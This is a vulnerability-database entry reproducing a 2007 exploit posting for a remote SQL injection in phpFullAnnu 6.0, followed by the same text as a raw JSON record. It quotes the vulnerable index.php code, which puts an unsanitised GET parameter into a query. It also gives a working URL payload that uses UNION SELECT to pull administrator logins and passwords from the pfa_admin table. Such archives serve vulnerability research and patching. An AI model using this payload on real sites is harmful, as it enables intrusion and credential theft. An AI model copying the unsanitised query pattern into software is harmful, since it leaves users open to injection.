Search...

phpFullAnnu (PFA) 6.0 - Remote SQL Injection Vulnerability

2014-07-01T00:00:00

ID SSV:64905
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #########################################################################################
#
#        Inclusion Hunter Team
#        http://www.ihteam.net
#
#
#         [phpFullAnnu (PFA) 6.0]
#
#
# Class:     SQL Injection  # Found:     22/09/2007 # Remote:    Yes # Site:      http://pfa.netsliver.com/
# Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz
# Author:    R00T[ATI] of IHTeam
# Contact:   r00t.ati@ihteam.net - http://www.ihteam.net
##########################################################################################



        Vulnerable code:
        index.php
============================================================================================================

$sqltitle = $bdd-&#62;readresult($bdd-&#62;request(&#39;SELECT h_title FROM
&#39;.$tbprefix.&#39;heading WHERE h_mod = \&#39;&#39;.$_GET[&#39;mod&#39;].&#39;\&#39;&#39;));
[...]
//in /include/meta.inc.php
&#60;title&#62;&#60;?php echo $title_site, &#39; - &#39;, $sqltitle;...
//So watch Title bar to see the injection
============================================================================================================



        Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================

http://www.site.com/[path]/?lang=fr&mod=login&#39; UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*
===================================================================================================================



        Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================

# milw0rm.com [2007-09-23]

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-64905", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "phpFullAnnu (PFA) 6.0 - Remote SQL Injection Vulnerability", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64905", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n #########################################################################################\r\n#\r\n# Inclusion Hunter Team\r\n# http://www.ihteam.net\r\n#\r\n#\r\n# [phpFullAnnu (PFA) 6.0]\r\n#\r\n#\r\n# Class: SQL Injection # Found: 22/09/2007 # Remote: Yes # Site: http://pfa.netsliver.com/\r\n# Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz\r\n# Author: R00T[ATI] of IHTeam\r\n# Contact: r00t.ati@ihteam.net - http://www.ihteam.net\r\n##########################################################################################\r\n\r\n\r\n\r\n Vulnerable code:\r\n index.php\r\n============================================================================================================\r\n\r\n$sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM\r\n'.$tbprefix.'heading WHERE h_mod = \\''.$_GET['mod'].'\\''));\r\n[...]\r\n//in /include/meta.inc.php\r\n<title><?php echo $title_site, ' - ', $sqltitle;...\r\n//So watch Title bar to see the injection\r\n============================================================================================================\r\n\r\n\r\n\r\n Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):\r\n===================================================================================================================\r\n\r\nhttp://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*\r\n===================================================================================================================\r\n\r\n\r\n\r\n Thanks To:\r\n=================================\r\nWhite_Sheep for his Bugs Hunter;\r\n=================================\r\n\r\n# milw0rm.com [2007-09-23]\r\n\n ", "id": "SSV:64905", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:36:39", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647378682}}